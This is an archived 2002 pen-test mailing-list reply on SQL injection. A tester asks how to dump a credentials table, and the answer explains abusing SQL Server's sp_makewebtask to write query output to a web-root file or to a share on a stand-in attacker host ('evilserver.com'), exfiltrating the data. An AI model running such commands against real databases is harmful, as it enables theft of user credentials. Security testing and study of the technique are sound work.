See if you can access sp_makewebtask. It builds an html table with the output of your query. It's installed by default without any kind of access control. It works like this: sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U''' (I'm pretty sure in SQL Server to use quoted parameters inside of quotes you double single quotes, not double quotes.) You can even specify a UNC path for the output file, like this: sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html', 'SELECT name FROM sysobjects WHERE xtype=''U''' The directory "publicshare" needs to be a wide open SMB share... if any kind of authentication challenge is present, the file won't be recieved. If that fails, you could use a perl or python script. Kevin Spett SPI Dynamics, Inc. > > > ----- Original Message ----- > From: "mel" <meling@scan-associates.net> > To: <pen-testat_private> > Sent: Wednesday, March 20, 2002 3:24 AM > Subject: SQL Injection - retrieving all rows > > > > Hi, > > > > I've been able to enumerate over 50 plus tables in a recent pen-test, > > now come the hard part - I want to dump data from the most important > > table that contains user names and passwords. However, the ASP app > > that I exploit only returns one row at a time. Is there anyway to > > overcome this? > > > > I've been looking for apps that return multiple rows (such as search,etc) > > but to know avail. I've tried dumping asp codes using BULK INSERT, but > > the command is only available for system account. Creating an stored > > procedure does not seem to work as well :( > > > > Now, I'm thinking of writing a script that dump the data one at a time, > > but I would like the advice from fellow pen-testers first. > > > > Cheers, > > > > --mel > > > > -------------------------------------------------------------------------- > -- > > This list is provided by the SecurityFocus Security Intelligence Alert > (SIA) > > Service. For more information on SecurityFocus' SIA service which > > automatically alerts you to the latest security vulnerabilities please > see: > > https://alerts.securityfocus.com/ > > > > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Mar 21 2002 - 08:42:38 PST